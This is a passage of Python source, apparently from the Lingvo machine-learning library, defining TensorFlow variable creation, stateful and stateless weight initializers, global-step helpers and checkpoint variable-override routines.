modifies a tf.Variable() call while this modifies a tf.get_variable() call. As
the code is migrated to TF2 and tf.get_variable() is deprecated, this may be
upgraded to using tf.variable_creator_scope instead.
This differs from tf.variable_scope(custom_getter=variable_creator) in that
the kwargs passed can be manipulated.
Variable creators are resolved from the outermost towards the innermost.
The innermost variable creator function is tf.get_variable.
The passed in kwargs must conform to what tf.get_variable accepts, with the
addition of `var_name` and `var_params`.
Args:
variable_creator: A variable creator function.
"""
_VARIABLE_CREATOR_STACK.append(variable_creator)
try:
yield
finally:
_VARIABLE_CREATOR_STACK.pop()
def PlaceOnTpuCore(core_id):
"""Returns a VariableCreatorScope that places variables on a given tpu core.
Only applies when running with TPUs.
Does not yet properly support model parallelism.
Args:
core_id: The tpu core id.
"""
def Creator(next_creator, **kwargs):
cluster = cluster_factory.Current()
if use_tpu():
device = cluster.WorkerDeviceInModelSplit(core_id)
elif (
tpu_compat() and
cluster.params.job in ('controller', 'trainer_client', 'executor_tpu')):
# The job is running in a fleet that uses tpu, but does not itself have
# access to the tpu, e.g. controller job. In this case, the returned
# device needs to be the cpu device on the tpu host for the given core.
# FIXME: the current implementation is wrong for large values of core_id.
device = cluster.ListDevices(cluster.params.worker)[0, 0]
else:
device = ''
with tf.device(device):
return next_creator(**kwargs)
return VariableCreatorScope(Creator)
# TODO(yonghui): Add support for partitioned Variables.
def CreateVariable(name,
params,
reuse=None,
trainable=True,
collections=None,
default_seed=None,
synchronization=tf.VariableSynchronization.AUTO,
aggregation=tf.VariableAggregation.NONE):
"""Creates tf.Variable according to param_config.
Args:
name: A string, name of the variable.
params: A WeightParams specifying the details of how this variable should be
constructed and initialized.
reuse: Whether or not to reuse an existing variable. It has the same
semantics as the reuse arg in tf.variable_scope.
trainable: Whether or not the variable is trainable.
collections: Override the default variable collection (
tf.GraphKeys.GLOBAL_VARIABLES).
default_seed: Seed to use for initialization if not specified in params.
Used for deterministic initialization in tests.
synchronization: Indicates when a distributed a variable will be aggregated.
Accepted values are constants defined in the class
tf.VariableSynchronization. By default the synchronization is set to AUTO
and the current DistributionStrategy chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class tf.VariableAggregation.
Returns:
The created variable.
"""
if use_stateless_vars_init():
return _CreateVariableStateless(name, params, reuse, trainable, collections,
default_seed, synchronization, aggregation)
else:
return _CreateVariableStateful(name, params, reuse, trainable, collections,
default_seed, synchronization, aggregation)
def _CreateVariableStateful(name,
params,
reuse=None,
trainable=True,
collections=None,
default_seed=None,
synchronization=tf.VariableSynchronization.AUTO,
aggregation=tf.VariableAggregation.NONE):
"""Creates tf.Variable using TF stateful RNGs according to param_config.
Args:
name: A string, name of the variable.
params: A WeightParams specifying the details of how this variable should be
constructed and initialized.
reuse: Whether or not to reuse an existing variable. It has the same
semantics as the reuse arg in tf.variable_scope.
trainable: Whether or not the variable is trainable.
collections: Override the default variable collection (
tf.GraphKeys.GLOBAL_VARIABLES).
default_seed: Seed to use for initialization if not specified in params.
Used for deterministic initialization in tests.
synchronization: Indicates when a distributed a variable will be aggregated.
Accepted values are constants defined in the class
tf.VariableSynchronization. By default the synchronization is set to AUTO
and the current DistributionStrategy chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class tf.VariableAggregation.
Returns:
The created variable.
"""
p = params.Copy()
shape = tf.TensorShape(ToStaticShape(p.shape)).as_list()
if shape:
assert all([dim_size > 0 for dim_size in shape]), shape
dim0 = shape[0]
else:
dim0 = 1
assert p.init.method == 'constant' or np.all(np.asarray(p.init.scale) >= 0)
method = p.init.method
scale = p.init.scale
seed = p.init.seed
if IsDefaultParamInit(p.init):
tf.logging.warning(
'WARNING!!! var %s is using the default xavier initializer.'
' Make sure this is intended.', name)
with tf.variable_scope(name) as scope:
var_name = GetVariableName(scope.name)
if tf.get_default_graph().seed is not None:
# We are in a program/test which need determistic randomization.
if seed is None:
if default_seed is not None:
seed = default_seed
else:
# We are not given a per-variable random seed. We use hash of
# variable name as a stable random seed.
seed = GenerateSeedFromName(var_name)
# If var_name matches a regex, then set the var_dtype; else use p.dtype.
var_dtype = FindDataType(var_name)
if var_dtype is None:
var_dtype = p.dtype
init_dtype = var_dtype.real_dtype
# TODO(b/172827074): we do not natively support var initialization for
# int8 type except for constant initialization.
# NOTE: For int8, we initialize by scaling float32 random values to integer.
if init_dtype == tf.int8:
init_dtype = tf.float32
v_init = _CreateVarInitStateful(name, method, shape, dim0, seed, scale,
init_dtype)
if var_dtype == tf.complex64:
def ComplexWrapper(init):
def _Wrapper(shape, dtype, partition_info):
del dtype
# A more complex alternative may be to use the init function for
# magnitudes and uniform random for phases instead.
shape = [2] + shape
value = init(shape, init_dtype, partition_info)
return tf.complex(value[0], value[1])
return _Wrapper
v_init = ComplexWrapper(v_init)
if var_dtype == tf.int8:
def FloatToInt8Wrapper(init):
def _Wrapper(shape, dtype, partition_info):
del dtype
value = init(shape, init_dtype, partition_info)
scale = tf.math.maximum(
tf.math.reduce_min(value) / -127,
tf.math.reduce_max(value) / 127)
value = tf.divide(value, scale)
return tf.cast(value, tf.int8)
return _Wrapper
v_init = FloatToInt8Wrapper(v_init)
# Variable creators.
def MaybePinVarsToCpu(next_creator, **kwargs):
if _FromGlobal('pin_vars_to_cpu'):
with tf.device('/cpu:0'):
return next_creator(**kwargs)
return next_creator(**kwargs)
def MaybeOpportunisticVariableReuse(next_creator, **kwargs):
try:
return next_creator(**kwargs)
except ValueError: # Possibly the variable already exists
if GetOpportunisticVariableReuse():
with tf.variable_scope(tf.get_variable_scope(), reuse=tf.AUTO_REUSE):
return next_creator(**kwargs)
else:
raise
def LingvoVariableCreator(next_creator, **kwargs):
"""Lingvo variable creator."""
# TODO(yonghui): Possibly get away from variable_scope and implement our own
# variable sharing mechanism.
with tf.variable_scope(name) as scope:
var_scope = tf.VariableScope(
scope.reuse,
custom_getter=scope.custom_getter,
caching_device=scope.caching_device,
use_resource=True)
with tf.variable_scope(var_scope), tf.variable_scope(var_name, reuse=reuse):
var = next_creator(**kwargs)
var_ref = var.experimental_ref() # For key in dict/set.
all_vars = _get_all_vars()
if var_ref in all_vars:
tf.logging.info('Reusing var %s', var.name)
cached = all_vars[var_ref]
assert cached == p.ToText(), ('Cached config:\n %s vs new config:\n %s' %
(cached, p.ToText()))
else:
tf.logging.info('Creating var %s shape=%s on device %s', var.name,
var.shape, var.device)
all_vars[var_ref] = p.ToText()
for col in p.collections:
tf.add_to_collection(col, var)
return var
with VariableCreatorScope(LingvoVariableCreator):
with VariableCreatorScope(MaybeOpportunisticVariableReuse):
with VariableCreatorScope(MaybePinVarsToCpu):
var = _GetVariableCreator()(
var_name=var_name,
var_params=p,
name='var',
shape=GetVariableShapePrefixes() + list(shape),
dtype=var_dtype,
initializer=v_init,
collections=collections,
trainable=trainable,
validate_shape=True,
synchronization=synchronization,
aggregation=aggregation)
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
if combined_layers_dims > 0:
# pylint: disable=protected-access
var.op._set_attr('_num_leading_dims_for_combined_layers',
attr_value_pb2.AttrValue(i=combined_layers_dims))
# Shard the variable according to the sharding spec.
tensor_split_dims_mapping = p.tensor_split_dims_mapping
if tensor_split_dims_mapping is not None:
tensor_split_dims_mapping = ([-1] * len(GetVariableShapePrefixes()) +
tensor_split_dims_mapping)
var = gshard_utils.MeshSplit(
var, p.device_mesh, tensor_split_dims_mapping, use_sharding_op=False)
return var
def _CreateVariableStateless(name,
params,
reuse=None,
trainable=True,
collections=None,
default_seed=None,
synchronization=tf.VariableSynchronization.AUTO,
aggregation=tf.VariableAggregation.NONE):
"""Creates tf.Variable using TF stateless RNGs according to `params`.
Args:
name: A string, name of the variable.
params: A WeightParams specifying the details of how this variable should be
constructed and initialized.
reuse: Whether or not to reuse an existing variable. It has the same
semantics as the reuse arg in tf.variable_scope.
trainable: Whether or not the variable is trainable.
collections: Override the default variable collection (
tf.GraphKeys.GLOBAL_VARIABLES).
default_seed: Seed to use for initialization if not specified in params.
Used for deterministic initialization in tests.
synchronization: Indicates when a distributed a variable will be aggregated.
Accepted values are constants defined in the class
tf.VariableSynchronization. By default the synchronization is set to AUTO
and the current DistributionStrategy chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class tf.VariableAggregation.
Returns:
The created variable.
"""
p = params.Copy()
shape = tf.TensorShape(ToStaticShape(p.shape)).as_list()
if shape:
assert all([dim_size > 0 for dim_size in shape]), shape
dim0 = shape[0]
else:
dim0 = 1
assert p.init.method == 'constant' or np.all(np.asarray(p.init.scale) >= 0)
method = p.init.method
scale = p.init.scale
seed = p.init.seed
if IsDefaultParamInit(p.init):
tf.logging.warning(
'WARNING!!! var %s is using the default xavier initializer.'
' Make sure this is intended.', name)
with tf.variable_scope(name) as scope:
var_name = GetVariableName(scope.name)
user_seed = seed if seed is not None else default_seed
seed = _GenerateStatelessRngSeed(var_name, user_seed)
# If var_name matches a regex, then set the var_dtype; else use p.dtype.
var_dtype = FindDataType(var_name)
if var_dtype is None:
var_dtype = p.dtype
init_dtype = var_dtype.real_dtype
v_init = _CreateVarInitStateless(name, method, shape, dim0, seed, scale,
init_dtype)
if var_dtype == tf.complex64:
raise TypeError(
'Stateless variable initialization does not support tf.complex64.')
def LingvoVariableCreator(next_creator, **kwargs):
"""Lingvo variable creator."""
# TODO(yonghui): Possibly get away from variable_scope and implement our own
# variable sharing mechanism.
with tf.variable_scope(name) as scope:
var_scope = tf.VariableScope(
scope.reuse,
custom_getter=scope.custom_getter,
caching_device=scope.caching_device,
use_resource=True)
with tf.variable_scope(var_scope), tf.variable_scope(var_name, reuse=reuse):
var = next_creator(**kwargs)
var_ref = var.experimental_ref() # For key in dict/set.
all_vars = _get_all_vars()
if var_ref in all_vars:
tf.logging.info('Reusing var %s', var.name)
cached = all_vars[var_ref]
assert cached == p.ToText(), ('Cached config:\n %s vs new config:\n %s' %
(cached, p.ToText()))
else:
tf.logging.info('Creating var %s shape=%s on device %s', var.name,
var.shape, var.device)
all_vars[var_ref] = p.ToText()
for col in p.collections:
tf.add_to_collection(col, var)
return var
with VariableCreatorScope(LingvoVariableCreator):
var = _GetVariableCreator()(
var_name=var_name,
var_params=p,
name='var',
shape=GetVariableShapePrefixes() + list(shape),
dtype=var_dtype,
initializer=v_init,
collections=collections,
trainable=trainable,
validate_shape=True,
synchronization=synchronization,
aggregation=aggregation)
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
if combined_layers_dims > 0:
# pylint: disable=protected-access
var.op._set_attr('_num_leading_dims_for_combined_layers',
attr_value_pb2.AttrValue(i=combined_layers_dims))
# Shard the variable according to the sharding spec.
tensor_split_dims_mapping = p.tensor_split_dims_mapping
if tensor_split_dims_mapping is not None:
tensor_split_dims_mapping = ([-1] * len(GetVariableShapePrefixes()) +
tensor_split_dims_mapping)
var = gshard_utils.MeshSplit(
var, p.device_mesh, tensor_split_dims_mapping, use_sharding_op=False)
return var
def _RandomXavierUniformInitializer(method, scale, seed):
"""Creates a random Xavier uniform initializer."""
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
def XavierUniform(shape, dtype, partition_info):
"""Xavier initialization (x = sqrt(6. / (in + out)); scale*[-x, x])."""
del partition_info # Unused.
if not shape:
raise ValueError('\'shape\' must not be \'None\' or 0 for XavierUniform')
fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if method == 'xavier':
limit = math.sqrt(6. / (fan_in + fan_out))
elif method == 'geo_mean_xavier':
limit = math.sqrt(3. / math.sqrt(fan_in * fan_out))
return scale * tf.random.uniform(shape, -limit, limit, dtype, seed)
return XavierUniform
def _CreateVarInitStateful(name, method, shape, dim0, seed, scale, init_dtype):
"""Creates variable initialization function for a stateful RNG."""
if (method in [
'gaussian_sqrt_dim', 'uniform_sqrt_dim', 'truncated_gaussian_sqrt_dim'
]):
if len(shape) > 2:
# This is probably not the right method to use when len(shape) > 2,
# e.g. dim0 will be 3 with a 3x3 conv2d kernel.
tf.logging.warning(
'Initializing %s of shape %s with method %s: dim0=%s. '
'Make sure that it is intended.', name, shape, method, dim0)
scale *= 1.0 / math.sqrt(dim0)
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
if method in ['gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanin']:
fan_in, _ = GetFanInFanOut(shape, combined_layers_dims)
if fan_in is not None:
scale *= 1.0 / math.sqrt(fan_in)
if method in ['gaussian_sqrt_fanout', 'truncated_gaussian_sqrt_fanout']:
_, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if fan_out is not None:
scale *= 1.0 / math.sqrt(fan_out)
if method in ['gaussian_sqrt_fanavg']:
fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if fan_in is not None and fan_out is not None:
scale *= math.sqrt(2.0 / (fan_in + fan_out))
if method in [
'gaussian', 'gaussian_sqrt_dim', 'gaussian_sqrt_fanin',
'gaussian_sqrt_fanout', 'gaussian_sqrt_fanavg'
]:
v_init = init_ops.random_normal_initializer(
mean=0.0, stddev=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform', 'uniform_sqrt_dim']:
v_init = init_ops.random_uniform_initializer(
minval=-scale, maxval=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform_positive']:
v_init = init_ops.random_uniform_initializer(
minval=0.0, maxval=scale, seed=seed, dtype=init_dtype)
elif method == 'category':
uniform_init = init_ops.random_uniform_initializer(
minval=0.0, maxval=scale, seed=seed, dtype=init_dtype)
v_init = lambda *args, **kwargs: tf.floor(uniform_init(*args, **kwargs))
elif method in ['uniform_unit_scaling']:
v_init = init_ops.uniform_unit_scaling_initializer(
factor=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform_unit_scaling_fan_avg']:
v_init = tf.variance_scaling_initializer(
scale=scale,
mode='fan_avg',
distribution='uniform',
seed=seed,
dtype=init_dtype)
elif method in [
'truncated_gaussian', 'truncated_gaussian_sqrt_dim',
'truncated_gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanout'
]:
v_init = init_ops.truncated_normal_initializer(
mean=0.0, stddev=scale, seed=seed, dtype=init_dtype)
elif method in ['constant']:
v_init = init_ops.constant_initializer(value=scale, dtype=init_dtype)
elif method in ['xavier', 'geo_mean_xavier']:
def XavierUniform(shape, dtype, partition_info):
"""Xavier initialization (x = sqrt(6. / (in + out)); scale*[-x, x])."""
del partition_info # Unused.
if not shape:
raise ValueError(
'\'shape\' must not be \'None\' or 0 for XavierUniform')
fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if method == 'xavier':
limit = math.sqrt(6. / (fan_in + fan_out))
elif method == 'geo_mean_xavier':
limit = math.sqrt(3. / math.sqrt(fan_in * fan_out))
return scale * tf.random.uniform(shape, -limit, limit, dtype, seed)
v_init = XavierUniform
elif method in [
'kaiming_uniform_fanin_relu', 'kaiming_uniform_fanin_leakyrelu'
]:
fan_in = np.prod(shape[:-1])
if method == 'kaiming_uniform_fanin_leakyrelu':
# Assume the 'a' parameter is the 'scale' argument.
gain = np.sqrt(2. / (1 + scale**2))
else:
gain = np.sqrt(2.)
std_dev = gain / np.sqrt(fan_in)
bound = np.sqrt(3.0) * std_dev
v_init = init_ops.random_uniform_initializer(
minval=-bound, maxval=bound, seed=seed, dtype=init_dtype)
else:
assert False, 'init_type `%s` not supported.' % method
return v_init
def _GenerateStatelessRngSeed(name, seed):
"""Generates a 2-tuple seed for a stateless variable initializer.
We want to ensure that different variables end up with different random values
even when they are passed the same seed and shape. To this aim, this function
generates a pseudo-unique seed by hashing the variable name and mapping it
into a scalar seed. More specifically, the returned value is a 2-tuple of
tf.int32 scalar, where the first element is the user-provided seed and the
second element is obtained by hashing the variable name.
Args:
name: The variable name for which to generate a stateless-like seed.
seed: The user-specified scalar seed.
Returns:
A 2-tuple seed of tf.int32 values (for TPU compatibility).
"""
seed0 = seed or 0
seed1 = GenerateSeedFromName(name)
return tf.constant([seed0, seed1], dtype=tf.int32)
def _DeterministicRandomNormalInitializer(seed, mean, stddev):
"""Creates a random normal initializer."""
def DeterministicNormal(shape, dtype, partition_info):
del partition_info # Unused.
return stateless_random_ops.stateless_random_normal(
shape=shape, seed=seed, mean=mean, stddev=stddev, dtype=dtype)
return DeterministicNormal
def _DeterministicRandomUniformInitializer(seed, minval, maxval):
"""Creates a random uniform initializer."""
def DeterministicUniform(shape, dtype, partition_info):
del partition_info # Unused.
return stateless_random_ops.stateless_random_uniform(
shape=shape, seed=seed, minval=minval, maxval=maxval, dtype=dtype)
return DeterministicUniform
def _DeterministicRandomTruncatedNormalInitializer(seed, mean, stddev):
"""Creates a random truncated normal initializer."""
def DeterministicTruncatedNormal(shape, dtype, partition_info):
del partition_info # Unused.
return stateless_random_ops.stateless_truncated_normal(
shape=shape, seed=seed, mean=mean, stddev=stddev, dtype=dtype)
return DeterministicTruncatedNormal
def _DeterministicRandomUniformUnitScalingInitializer(seed, factor):
"""Creates a random uniform unit scaling initializer."""
def DeterministicUniformUnitScaling(shape, dtype, partition_info):
# The following logic is originally from (UniformUnitScaling.__call__())
# in TensorFlow: python/ops/init_ops.py
scale_shape = shape
if partition_info is not None:
scale_shape = partition_info.full_shape
input_size = 1.0
# Estimating input size is not possible to do perfectly, but we try.
# The estimate, obtained by multiplying all dimensions but the last one,
# is the right thing for matrix multiply and convolutions (see above).
for dim in scale_shape[:-1]:
input_size *= float(dim)
# Avoid errors when initializing zero-size tensors.
input_size = max(input_size, 1.0)
maxval = math.sqrt(3 / input_size) * factor
return stateless_random_ops.stateless_random_uniform(
shape=shape, seed=seed, minval=-maxval, maxval=maxval, dtype=dtype)
return DeterministicUniformUnitScaling
def _DeterministicRandomVarianceScalingInitializer(scale, mode, distribution,
seed):
"""Creates a variance scaling initializer."""
if scale <= 0.:
raise ValueError('`scale` must be positive float.')
if mode not in {'fan_in', 'fan_out', 'fan_avg'}:
raise ValueError('Invalid `mode` argument:', mode)
distribution = distribution.lower()
if distribution not in {
'normal', 'uniform', 'truncated_normal', 'untruncated_normal'
}:
raise ValueError('Invalid `distribution` argument:', distribution)
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
def DeterministicVarianceScaling(shape, dtype, partition_info):
# This is originally from TensorFlow: python/ops/init_ops.py
scale_shape = shape
if partition_info is not None:
scale_shape = partition_info.full_shape
# Handle special case of empty list as shape, since fan_in and fan_out
# are numerically added below. Without this, GetFanInFanOut() would
# return None, None instead.
if isinstance(scale_shape, (list, tuple)) and not scale_shape:
fan_in, fan_out = 1, 1
else:
fan_in, fan_out = GetFanInFanOut(scale_shape, combined_layers_dims)
if mode == 'fan_in':
scale_inner = scale / max(1., fan_in)
elif mode == 'fan_out':
scale_inner = scale / max(1., fan_out)
else:
scale_inner = scale / max(1., (fan_in + fan_out) / 2.)
if distribution == 'normal' or distribution == 'truncated_normal':
# constant taken from scipy.stats.truncnorm.std(
# a=-2, b=2, loc=0., scale=1.)
stddev = math.sqrt(scale_inner) / .87962566103423978
return stateless_random_ops.stateless_truncated_normal(
shape=shape, seed=seed, mean=0.0, stddev=stddev, dtype=dtype)
elif distribution == 'untruncated_normal':
stddev = math.sqrt(scale_inner)
return stateless_random_ops.stateless_random_normal(
shape=shape, seed=seed, mean=0.0, stddev=stddev, dtype=dtype)
else:
limit = math.sqrt(3.0 * scale_inner)
return stateless_random_ops.stateless_random_uniform(
shape=shape, seed=seed, minval=-limit, maxval=limit, dtype=dtype)
return DeterministicVarianceScaling
def _DeterministicRandomXavierUniformInitializer(method, scale, seed):
"""Creates a variance scaling initializer."""
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
def XavierUniform(shape, dtype, partition_info):
"""Xavier initialization (x = sqrt(6. / (in + out)); scale*[-x, x])."""
del partition_info # Unused.
if not shape:
raise ValueError('\'shape\' must not be \'None\' or 0 for XavierUniform')
fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if method == 'xavier':
limit = math.sqrt(6. / (fan_in + fan_out))
elif method == 'geo_mean_xavier':
limit = math.sqrt(3. / math.sqrt(fan_in * fan_out))
return scale * stateless_random_ops.stateless_random_uniform(
shape, seed, -limit, limit, dtype)
return XavierUniform
def _CreateVarInitStateless(name, method, shape, dim0, seed, scale, init_dtype):
"""Creates variable initialization function for a stateless RNG."""
if (method in [
'gaussian_sqrt_dim', 'uniform_sqrt_dim', 'truncated_gaussian_sqrt_dim'
]):
if len(shape) > 2:
# This is probably not the right method to use when len(shape) > 2,
# e.g. dim0 will be 3 with a 3x3 conv2d kernel.
tf.logging.warning(
'Initializing %s of shape %s with method %s: dim0=%s. '
'Make sure that it is intended.', name, shape, method, dim0)
scale *= 1.0 / math.sqrt(dim0)
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
if method in ['gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanin']:
fan_in, _ = GetFanInFanOut(shape, combined_layers_dims)
if fan_in is not None:
scale *= 1.0 / math.sqrt(fan_in)
if method in ['gaussian_sqrt_fanout', 'truncated_gaussian_sqrt_fanout']:
_, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if fan_out is not None:
scale *= 1.0 / math.sqrt(fan_out)
if method in ['gaussian_sqrt_fanavg']:
fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if fan_in is not None and fan_out is not None:
scale *= math.sqrt(2.0 / (fan_in + fan_out))
if method in [
'gaussian', 'gaussian_sqrt_dim', 'gaussian_sqrt_fanin',
'gaussian_sqrt_fanout', 'gaussian_sqrt_fanavg'
]:
v_init = _DeterministicRandomNormalInitializer(
seed=seed, mean=0., stddev=scale)
elif method in ['uniform', 'uniform_sqrt_dim']:
v_init = _DeterministicRandomUniformInitializer(
seed=seed, minval=-scale, maxval=scale)
elif method in ['uniform_positive']:
v_init = _DeterministicRandomUniformInitializer(
seed=seed, minval=0., maxval=scale)
elif method in ['uniform_unit_scaling']:
v_init = _DeterministicRandomUniformUnitScalingInitializer(
seed=seed, factor=scale)
elif method in ['uniform_unit_scaling_fan_avg']:
v_init = _DeterministicRandomVarianceScalingInitializer(
scale=scale, mode='fan_avg', distribution='uniform', seed=seed)
elif method in [
'truncated_gaussian', 'truncated_gaussian_sqrt_dim',
'truncated_gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanout'
]:
v_init = _DeterministicRandomTruncatedNormalInitializer(
seed=seed, mean=0., stddev=scale)
elif method in ['constant']:
v_init = init_ops.constant_initializer(value=scale, dtype=init_dtype)
elif method in ['xavier', 'geo_mean_xavier']:
v_init = _DeterministicRandomXavierUniformInitializer(method, scale, seed)
elif method in [
'kaiming_uniform_fanin_relu', 'kaiming_uniform_fanin_leakyrelu'
]:
fan_in = np.prod(shape[:-1])
if method == 'kaiming_uniform_fanin_leakyrelu':
# Assume the 'a' parameter is the 'scale' argument.
gain = np.sqrt(2. / (1 + scale**2))
else:
gain = np.sqrt(2.)
std_dev = gain / np.sqrt(fan_in)
bound = np.sqrt(3.0) * std_dev
v_init = _DeterministicRandomUniformInitializer(
seed=seed, minval=-bound, maxval=bound)
else:
assert False, 'init_type %s not supported.' % method
return v_init
_global_variable_scope = None
def GetGlobalVariableScope():
"""Gets the global variable scope (as if no variable_scope has been set).
Returns:
The VariableScope corresponding to as if no tf.variable_scope is in effect.
"""
if not _global_variable_scope:
# Each thread gets its own default global variable scope, and we take
# advantage of that in order to get a top-level scope. This avoids the
# need to call tf.get_variable_scope() at the module level, which allows
# this module to be imported without modifying global state (i.e. creating
# the default graph). It is important to not mutate the global state at
# module load time, because it let's us flip flags after import that affect
# core TensorFlow behavior.
def Initialize():
global _global_variable_scope
_global_variable_scope = tf.get_variable_scope()
t = threading.Thread(target=Initialize)
t.start()
t.join()
return _global_variable_scope
_GLOBAL_STEP_STACK = ThreadLocalStack()
@contextlib.contextmanager
def GlobalStepContext(global_step_tensor):
_GLOBAL_STEP_STACK.stack.append(global_step_tensor)
try:
yield
finally:
_GLOBAL_STEP_STACK.stack.pop()
def GetGlobalStep():
"""Return the global_step."""
if _GLOBAL_STEP_STACK.stack:
return _GLOBAL_STEP_STACK.stack[-1]
return tf.train.get_global_step()
def GetOrCreateGlobalStepVar():
"""Return the global_step variable, creating it if it does not exist.
Prefer GetGlobalStep if a tensor rather than a tf.Variable is sufficient.
Returns:
The global_step variable, or a new created one if it does not exist.
"""
with tf.variable_scope(GetGlobalVariableScope(), use_resource=True):
if _FromGlobal('pin_vars_to_cpu'):
with tf.device('/cpu:0'):
return tf.train.get_or_create_global_step()
else:
return tf.train.get_or_create_global_step()
def LogMultiLines(label, lines):
if not isinstance(lines, (list, tuple)):
lines = lines.split('\n')
for line in lines:
tf.logging.info('%s: %s', label, line)
def _LogPlacement(label, theta, copy):
"""Logs theta and its copy's device placement."""
def GetDevices(m):
"""Flatten a `.NestedMap` m and extracts each value's device."""
return [x.device for x in m.Flatten()]
tf.logging.info('=== %s ===', label)
LogMultiLines(
label,
theta.Pack([('%s -> %s' % (x[0], x[1]))
for x in zip(GetDevices(theta), GetDevices(copy))
]).DebugString())
tf.logging.info('==========')
def CreateLocalTheta(theta, device_list=None, label=None):
"""Creates local copy of theta and shards across devices device list.
Leaves variables intact.
Args:
theta: a `.NestedMap` of variables.
device_list: list of devices to shard across. If None, defaults to a list
[''].
label: Logging label.
Returns:
A `.NestedMap` of identity() wrapped theta
"""
class AddIdentity:
"""Helper class."""
def __init__(self, device_list):
self._list = device_list if device_list else ['']
self._index = 0
def __call__(self, x):
if isinstance(x, tf.Variable):
return x
with tf.device(self._list[self._index % len(self._list)]):
self._index += 1
return tf.identity(x)
copy = theta.Transform(AddIdentity(device_list))
_LogPlacement(label, theta, copy)
return copy
def _GetVarsToLoad(all_vars, variable_loading_rules, var_ignore_rules,
ckpt_path):
"""Determines variables to load and their names in checkpoint."""
# This list contains mappings from var names as they appear in the checkpoint
# to the vars in our model they correspond to.
vars_to_load = []
for model_var in all_vars:
loaded = False
for regexp, name_format in variable_loading_rules:
match = re.match(regexp, model_var.name)
# Skip if var doesn't match the loading rules, or if it should be ignored.
if not match:
tf.logging.debug('Loading rules do not match %s.', model_var.name)
continue
elif any(re.match(r, model_var.name) for r in var_ignore_rules):
tf.logging.debug('Ignoring %s from loading.', model_var.name)
continue
checkpoint_var_name = name_format % match.groups()
if checkpoint_var_name.endswith(':0'):
checkpoint_var_name = checkpoint_var_name[:-2]
tf.logging.info('Loading %s from %s with regexp: %s', model_var.name,
checkpoint_var_name, regexp)
vars_to_load.append((checkpoint_var_name, model_var))
loaded = True
break
if not loaded:
tf.logging.info(
'Not loading model variable %s from %s as it does not match any rules'
' or matches ignored', model_var.name, ckpt_path)
return vars_to_load
def OverrideVarsFromCheckpoint(all_vars, checkpoint_path,
variable_loading_rules, var_ignore_rules):
"""Add TF graph ops to override variables from a provided checkpoint.
Args:
all_vars: List of all the parameters in the model.
checkpoint_path: A path to the checkpoints of a pretrained model.
variable_loading_rules: A list of tuples of strings defining (regex to match
parameter names in the model to override, format string to determine the
corresponding var in the checkpoint).
var_ignore_rules: A list consisting of a list of regexes to match parameter
names in the model which should not be overridden, even if they match
those in the loading rules.
Returns:
A callable that, when called with a tf.Session, will restore the variables
from the provided checkpoint.
"""
vars_to_load = _GetVarsToLoad(all_vars, variable_loading_rules,
var_ignore_rules, checkpoint_path)
if not vars_to_load:
all_rules_text = '\n'.join(
[f'{k} --> {v}' for k, v in variable_loading_rules])
raise ValueError(f'Variable loading rules {all_rules_text} '
f'did not match any of {len(all_vars)} vars.')
load_var_names = '\n'.join(sorted([v.name for _, v in vars_to_load]))
tf.logging.info(f'Overriding {len(vars_to_load)} vars from '
f'{checkpoint_path}:\n{load_var_names}')
savers = []
while vars_to_load:
# When restoring, it's possible the same value in the checkpoint
# can be restored to multiple variables (e.g. during
# distillation). However, tf.train.Saver, since it's used for
# both saving and restoring, requires the name in the checkpoint
# to be unique for each variable. So, we call it multiple times
# with a unique set of names each time.
unique_vars_to_load = {}
remaining_vars_to_load = []
for k, v in vars_to_load:
if k not in unique_vars_to_load:
unique_vars_to_load[k] = v
else:
remaining_vars_to_load.append((k, v))
savers.append(tf.train.Saver(var_list=unique_vars_to_load, sharded=True))
vars_to_load = remaining_vars_to_load
def _Restore(sess):
for saver in savers:
saver.restore(sess, checkpoint_path)
return _Restore
def OverrideVarsFromCheckpoints(all_vars, ckpts_loading_rules):
"""Add TF graph ops to override model variables from checkpoints.
Args:
all_vars: List of all the parameters in the model.
ckpts_loading_rules: A dictionary of checkpoint path: loading rules.
Checkpoint path must be a path to a pretrained model, and loading rules is
expected to be a tuple of two lists. The first consisting of tuples of
strings defining (regex to match parameter names in the model to override,
format string to determine the corresponding var in the checkpoint), and
the second list consisting of a list of regexes to match parameter names
in the model which should not be overridden, even if they match those in
the loading rules.
Returns:
A callable that, when called with a tf.Session, will restore the variables
from checkpoint and return a list of overwritten variables.
Raises:
ValueError: if colliding vars exist or loading rules is not a list.
"""
if len(ckpts_loading_rules) > 1:
tf.logging.info('Overriding vars from multiple checkpoints.')
var_refs_overridden = set()
var_names_overridden = set()
restore_fns = []
for ckpt_path, loading_rules in ckpts_loading_rules.items():
tf.logging.info('Overriding vars from checkpoint: %s', ckpt_path)
if not isinstance(loading_rules, tuple):
raise ValueError('Loading rules for %s must be a tuple of two lists!' %
ckpt_path)
if len(loading_rules) != 2 or not all(
isinstance(l, list) for l in loading_rules):
raise ValueError('Loading rules for %s must be a tuple of two lists!' %
ckpt_path)
# Filter the model variables to be overridden.
to_load_vars = _GetVarsToLoad(all_vars, loading_rules[0], loading_rules[1],
ckpt_path)
var_refs_to_override = [var[1].experimental_ref() for var in to_load_vars]
